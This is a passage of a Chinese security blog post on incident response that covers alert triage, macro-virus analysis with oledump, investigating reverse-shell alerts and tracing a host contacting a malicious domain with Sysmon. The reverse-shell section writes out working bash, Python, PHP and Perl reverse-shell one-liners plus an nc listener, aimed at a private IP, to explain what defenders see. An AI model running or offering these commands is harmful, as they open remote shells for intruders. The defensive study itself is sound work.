<p>5.计划任务</p>
<p>6.日志分析</p>
</blockquote>
<h4 id="常见研判经验"><a href="#常见研判经验" class="headerlink" title="常见研判经验"></a>常见研判经验</h4><p>告警分析类型：</p>
<p>1.业务误报：</p>
<p>原因：由于开发代码不规范或防护设备拦截策略问题引起的误报。</p>
<p>特点：大量请求，处罚漏洞类型类似，触发事件有一定规律。</p>
<p>2.扫描器请求</p>
<p>原因：僵尸网络批量全网扫描引发的攻击流量告警，或扫描器引发的无意义的漏洞。</p>
<p>特点：大量请求、攻击频率高、攻击请求与实际环境有违背、攻击特征比较明显。</p>
<p>3.告警真实攻击</p>
<p>原因：由真实攻击者引发的攻击告警。</p>
<p>特点：攻击频率较低，攻击请求与实际环境相结合，攻击请求偏深度利用。</p>
<p>4.灰色软件告警</p>
<p>原因：办公终端从第三方网站下载盗版软件。</p>
<p>特点：请求灰色域名，例如 鲁大师、发票网站、壁纸软件、盗版Chrome、搜狗输入法等。</p>
<h4 id="部分告警分析思路"><a href="#部分告警分析思路" class="headerlink" title="部分告警分析思路"></a>部分告警分析思路</h4><h5 id="宏病毒分析"><a href="#宏病毒分析" class="headerlink" title="宏病毒分析"></a>宏病毒分析</h5><p>在日常监测过程中，经常会在探海或全流量设备中 产生 恶意木马的相关告警。主要由于内统一模版文档中含义部分可疑命令的宏脚本，在发邮件或下载文档时尝尝会被安全设备记录为恶意木马，这些都需要在监测过程中进行研判处置。</p>
<p>宏（英文Macro），广义上的定义是：宏就是把一系列的指令组织成一独立的命令，类似C语言中#define宏定义，避免同一动作的一再重复；狭义上，宏特指office系列办公软件中的宏，Microsoft Office中对宏的定义为“宏就是能够组织在一起的，可以作为一个独立命令来执行的一系列Word 命令，它能使日常工作变得容易。”本文中提到的宏，采用了狭义的定义，即office办公软件中的宏。</p>
<p>使用office打开文档文件(demo1.doc)时，有时候我们会遇到如下图所示的“安全警告”，这说明该文档文件中含有宏，并且office软件设置了“宏禁用”功能。</p>
<h6 id="oledump"><a href="#oledump" class="headerlink" title="oledump"></a>oledump</h6><p>oledump.py 是一个用于分析OLE文件 的工具</p>
<p>工具地址： <a target="_blank" rel="noopener" href="https://github.com/DidierStevens/DidierStevensSuite/blob/master/oledump.py">https://github.com/DidierStevens/DidierStevensSuite/blob/master/oledump.py</a></p>
<p><img src="/posts/a0e2d364/image2025-4-2_16-26-26.png" alt="image2025-4-2_16-26-26"></p>
<h5 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h5><p>  <a target="_blank" rel="noopener" href="https://www.revshells.com/">https://www.revshells.com/</a></p>
<blockquote>
<p>nc -lvvp 7777</p>
<p>bash -i &gt;&amp; /dev/tcp/192.168.7.61/7777 0&gt;&amp;1</p>
<p>python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.7.61”,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’</p>
<p>php -r ‘$sock=fsockopen(“192.168.7.61”,7777);exec(“/bin/bash -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3”);’</p>
<p>perl -e ‘use Socket;$i=”192.168.7.61”;$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”&gt;&amp;S”);open(STDOUT,”&gt;&amp;S”);open(STDERR,”&gt;&amp;S”);exec(“/bin/sh -i”);};’</p>
</blockquote>
<p>反弹shell的本质是把bash/zsh等进程的 0 1 2 输入输出重定向到远程socket，由socket中获取输入，重定向 标准输出（1）和错误输出（2）到socket</p>
<p><img src="/posts/a0e2d364/image2025-4-7_14-27-42.png" alt="image2025-4-7_14-27-42"></p>
<p>1.判断告警的真实性</p>
<p>判断反弹shell告警是否是误报。<strong>从反弹shell的反连地址做一个简单的判断</strong>，如果反连地址是不是公司的白名单或者有业务往来的地址，那么大概率该条告警是真实的。</p>
<p>2.确认入侵点</p>
<p>攻击者能够执行反弹shell操作，说明已经了系统的权限或者系统中存在RCE漏洞【web(rce\文件上传\文件包含…)、数据库(mysql\mssql\redis)、系统应用(ssh\内核漏洞…)】，我们需要第一时间找点该风险点及时修复，防止下次入侵。</p>
<p>发现相关告警时可通过告警信息获取攻击时间、进程信息、连接地址等信息。</p>
<p>3.反弹shell排查思路</p>
<p>(1)确认入侵时间以及上传文件内容</p>
<p>通过反弹shell的时间 判断攻击者攻击的大体范围，并根据此时间进行范围进行溯源分析、追踪攻击者的攻击路径。</p>
<p>(2)日志分析</p>
<p>对访问网站/服务器的Web日志和系统日志进行分析，重点关注已知的入侵时间前后的日志记录，从而寻找攻击者的攻击路径，以及所利用的漏洞。</p>
<p>(3)找到失陷点</p>
<p>根据日志分析过程中发现的问题，找到网站/服务器中存在的漏洞进行分析。</p>
<p>(4)漏洞复现</p>
<p>对存在的漏洞进行复现，还原攻击者的攻击路径。</p>
<h5 id="外联恶意域名"><a href="#外联恶意域名" class="headerlink" title="外联恶意域名"></a>外联恶意域名</h5><p>在日常监测过程中，经常会遇到非法外联、僵尸网络这样的情况，在排出的时候却无从下手，不知该如何进行分析。在设备上看到了外联的DNS请求通过进程，网络连接情况等，却又找不到问题点，一时无从下手，最终在努力下找到了入手点，借此在这里进行分享希望对遇到相同问题的有所帮助。</p>
<p>面对恶意域名请求解析这样的问题，可以按照以下思路进行排查：</p>
<p>(1).这个恶意请求是否是正常行为；</p>
<p>(2).是什么程序发起了域名解析请求；</p>
<p>(3).我在进程中该如何定位这个程序；</p>
<p>(4).我该如何定位到这个程序的PID已经附属进场；</p>
<p>(5).是否有启动项和计划任务。</p>
<p>Windows下 可使用以下几种工具去定位可疑进程程序。</p>
<p>1.DNSLookUpView (适用高于win8版本的windows机器)</p>
<p>下载地址：<a target="_blank" rel="noopener" href="https://www.nirsoft.net/utils/dnslookupview.zip">https://www.nirsoft.net/utils/dnslookupview.zip</a></p>
<p><img src="/posts/a0e2d364/image2025-4-7_16-18-54.png" alt="image2025-4-7_16-18-54"></p>
<p>可根据对应dns请求 定位到进程PID 再进一步去找到对应进程的文件位置</p>
<p><img src="/posts/a0e2d364/image2025-4-7_16-20-47.png" alt="image2025-4-7_16-20-47"></p>
<p>2.sysmon + dnsquerysniffer</p>
<p>sysmon下载地址：<a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon">https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon</a></p>
<p>dnsquerysniffer下载地址：</p>
<p>首先安装 sysmon (适用于xp外的大多版本 )</p>
<p>安装后打开 dnsquerysniffer 观察此主机请求恶意域名的情况。</p>
<p>等待监控到请求恶意域名的情况，当检测到请求的恶意域名后可通过日志查看器查看sysmon的日志 以定位到恶意木马文件</p>
<p><img src="/posts/a0e2d364/image2025-4-7_16-22-42.png" alt="image2025-4-7_16-22-42"></p>
<p>右键点击此电脑—&gt;管理—&gt;事件查看器—&gt;应用程序和服务日志—&gt;Microsoft—&gt;Windows—&gt;Sysmon—&gt;Operational。</p>
<p>或者 winkey+r 调出“运行框”，输入eventvwr.msc 进入“事件查看器”</p>
<p><img src="/posts/a0e2d364/image2025-4-7_16-23-34.png" alt="image2025-4-7_16-23-34"></p>
<p>筛选事件ID为22的日志，之后查找日志内容中有关键字：<a target="_blank" rel="noopener" href="http://xred.mooo.com">xred.mooo.com</a>的日志。</p>
<p><img src="/posts/a0e2d364/image2025-4-7_16-23-54.png" alt="image2025-4-7_16-23-54"></p>
<p><img src="/posts/a0e2d364/image2025-4-7_16-23-58.png" alt="image2025-4-7_16-23-58"></p>
<p>选中日志双击就可以打开日志的详细信息，查看到是 2025-02-07 10:27:13 的时候程序 C:\ProgramData\Synaptics\Synaptics.exe 请求的域名：<a target="_blank" rel="noopener" href="http://xred.mooo.com">xred.mooo.com</a></p>
<p><img src="/posts/a0e2d364/image2025-4-7_16-24-19.png" alt="image2025-4-7_16-24-19"></p>
<p>对于计划任务和自启动项可通过火绒剑、AutoRuns此类工具进行排查，亦可手动排查 任务计划程序、自启动注册表项等</p>
<h3 id="References"><a href="#References" class="headerlink" title="References"></a>References</h3><p> <a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_53568983/article/details/143032581">https://blog.csdn.net/qq_53568983/article/details/143032581</a> </p>
<p> <a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/MZiGqBpAbCoAMEZkxq6L2g">https://mp.weixin.qq.com/s/MZiGqBpAbCoAMEZkxq6L2g</a></p>

    </div>

    
    
    
        

  <div class="followme">
    <p>欢迎关注我的其它发布渠道</p>

    <div class="social-list">

        <div class="social-item">
          <a target="_blank" class="social-link" href="/images/wechat_channel.jpg">
            <span class="icon">
              <i class="fab fa-weixin"></i>
            </span>

            <span class="label">WeChat</span>
          </a>
        </div>

        <div class="social-item">
          <a target="_blank" class="social-link" href="/atom.xml">
            <span class="icon">
              <i class="fa fa-rss"></i>
            </span>

            <span class="label">RSS</span>
          </a>
        </div>
    </div>
  </div>


<div>

  <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------</div>
    
</div>

</div>

<div>
      
        
      
</div>

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/58d3432d/" rel="prev" title="动态分值函数">
      <i class="fa fa-chevron-left"></i> 动态分值函数
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BA%A2%E9%98%9F%E8%A7%86%E8%A7%92%E4%B8%8B%E7%9A%84%E6%94%BB%E5%87%BB"><span class="nav-number">1.</span> <span class="nav-text">红队视角下的攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BA%A2%E9%98%9F%E6%94%BB%E5%87%BB%E6%B5%81%E7%A8%8B"><span class="nav-number">1.1.</span> <span class="nav-text">红队攻击流程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BA%A2%E9%98%9F%E6%94%BB%E5%87%BB%E6%89%8B%E6%B3%95"><span class="nav-number">1.2.</span> <span class="nav-text">红队攻击手法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%96%B9%E4%BD%9C%E4%B8%9A%E7%89%B9%E7%82%B9"><span class="nav-number">1.3.</span> <span class="nav-text">攻击方作业特点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E6%96%B9%E5%BE%97%E5%88%86%E7%82%B9"><span class="nav-number">1.4.</span> <span class="nav-text">攻击方得分点</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%89%E5%85%A8%E5%A8%81%E8%83%81%E4%BA%8B%E4%BB%B6%E5%88%86%E6%9E%90"><span class="nav-number">2.</span> <span class="nav-text">安全威胁事件分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E8%80%85%E6%84%8F%E5%9B%BE%E5%88%86%E6%9E%90"><span class="nav-number">2.1.</span> <span class="nav-text">攻击者意图分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E5%91%8A%E8%AD%A6%E7%B1%BB%E5%9E%8B"><span class="nav-number">2.2.</span> <span class="nav-text">常见的告警类型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%A8%81%E8%83%81%E5%91%8A%E8%AD%A6%E5%88%86%E6%9E%90%E6%80%9D%E8%B7%AF"><span class="nav-number">2.3.</span> <span class="nav-text">威胁告警分析思路</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%94%BB%E5%87%BB%E8%A1%8C%E4%B8%BA%E5%88%A4%E6%96%AD"><span class="nav-number">2.4.</span> <span class="nav-text">攻击行为判断</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#SQL%E6%B3%A8%E5%85%A5"><span class="nav-number">2.4.1.</span> <span class="nav-text">SQL注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Webshell%E4%B8%8A%E4%BC%A0"><span class="nav-number">2.4.2.</span> <span class="nav-text">Webshell上传</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%B8%BB%E6%9C%BA%E6%84%9F%E6%9F%93%E6%8C%96%E7%9F%BF-%E5%83%B5%E6%9C%A8%E8%A0%95"><span class="nav-number">2.4.3.</span> <span class="nav-text">主机感染挖矿&#x2F;僵木蠕</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="nav-number">2.4.4.</span> <span class="nav-text">暴力破解</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%B8%BB%E6%9C%BA%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.4.5.</span> <span class="nav-text">主机漏洞</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E6%94%BB%E5%87%BB%E7%89%B9%E5%BE%81"><span class="nav-number">2.5.</span> <span class="nav-text">常见的攻击特征</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%BB%A3%E7%90%86%E5%B7%A5%E5%85%B7"><span class="nav-number">2.5.1.</span> <span class="nav-text">代理工具</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Webshell"><span class="nav-number">2.5.2.</span> <span class="nav-text">Webshell</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#C2%E6%B5%81%E9%87%8F%E7%89%B9%E5%BE%81"><span class="nav-number">2.5.3.</span> <span class="nav-text">C2流量特征</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E6%8E%92%E6%9F%A5%E5%A4%84%E7%BD%AE"><span class="nav-number">3.</span> <span class="nav-text">应急响应排查处置</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E5%B7%A5%E5%85%B7"><span class="nav-number">3.1.</span> <span class="nav-text">常用工具</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Windows%E5%B7%A5%E5%85%B7"><span class="nav-number">3.1.1.</span> <span class="nav-text">Windows工具</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Linux-%E5%B7%A5%E5%85%B7"><span class="nav-number">3.1.2.</span> <span class="nav-text">Linux 工具</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%9C%A8%E7%BA%BF%E7%BD%91%E7%AB%99"><span class="nav-number">3.1.3.</span> <span class="nav-text">在线网站</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BA%94%E6%80%A5%E6%8E%92%E6%9F%A5%E6%80%9D%E8%B7%AF"><span class="nav-number">3.2.</span> <span class="nav-text">应急排查思路</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Windows"><span class="nav-number">3.2.1.</span> <span class="nav-text">Windows</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Linux"><span class="nav-number">3.2.2.</span> <span class="nav-text">Linux</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E7%A0%94%E5%88%A4%E7%BB%8F%E9%AA%8C"><span class="nav-number">3.3.</span> <span class="nav-text">常见研判经验</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%83%A8%E5%88%86%E5%91%8A%E8%AD%A6%E5%88%86%E6%9E%90%E6%80%9D%E8%B7%AF"><span class="nav-number">3.4.</span> <span class="nav-text">部分告警分析思路</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%AE%8F%E7%97%85%E6%AF%92%E5%88%86%E6%9E%90"><span class="nav-number">3.4.1.</span> <span class="nav-text">宏病毒分析</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#oledump"><span class="nav-number">3.4.1.1.</span> <span class="nav-text">oledump</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">3.4.2.</span> <span class="nav-text">反弹shell</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%A4%96%E8%81%94%E6%81%B6%E6%84%8F%E5%9F%9F%E5%90%8D"><span class="nav-number">3.4.3.</span> <span class="nav-text">外联恶意域名</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#References"><span class="nav-number">4.</span> <span class="nav-text">References</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Mamor"
      src="/images/kabi.jpg">
  <p class="site-author-name" itemprop="name">Mamor</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">198</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">53</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">54</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Mamor5409" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Mamor5409" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.yuque.com/mamor" title="Yuque → https:&#x2F;&#x2F;www.yuque.com&#x2F;mamor" rel="noopener" target="_blank"><i class="yuque fa-fw"></i>Yuque</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Mamor</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">1.3m</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">19:31</span>
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>
-->

<!--
<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共277.8k字</span>
</div>
-->
        
<div class="busuanzi-count">
  <script data-pjax async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
          load: ['[tex]/mhchem'],
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
          packages: {'[+]': ['mhchem']},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  

    </div>


<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/love.js"></script>
<!--单击显示文字-->
<script type="text/javascript" src="/js/ClickShowText.js"></script>

<script type="text/javascript">
var windowWidth = $(window).width();
if (windowWidth > 768) {
    document.write('<script type="text/javascript" src="/js/sakura.js"><\/script>');
}
</script>






  <script src="/js/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>


<a href="https://mamor5409.github.io/" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#64CEAA; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"rect":"opacity:0.7","log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>



<!--崩溃欺骗-->
<script type="text/javascript" src="/js/src/crash_cheat.js"></script>

</html>

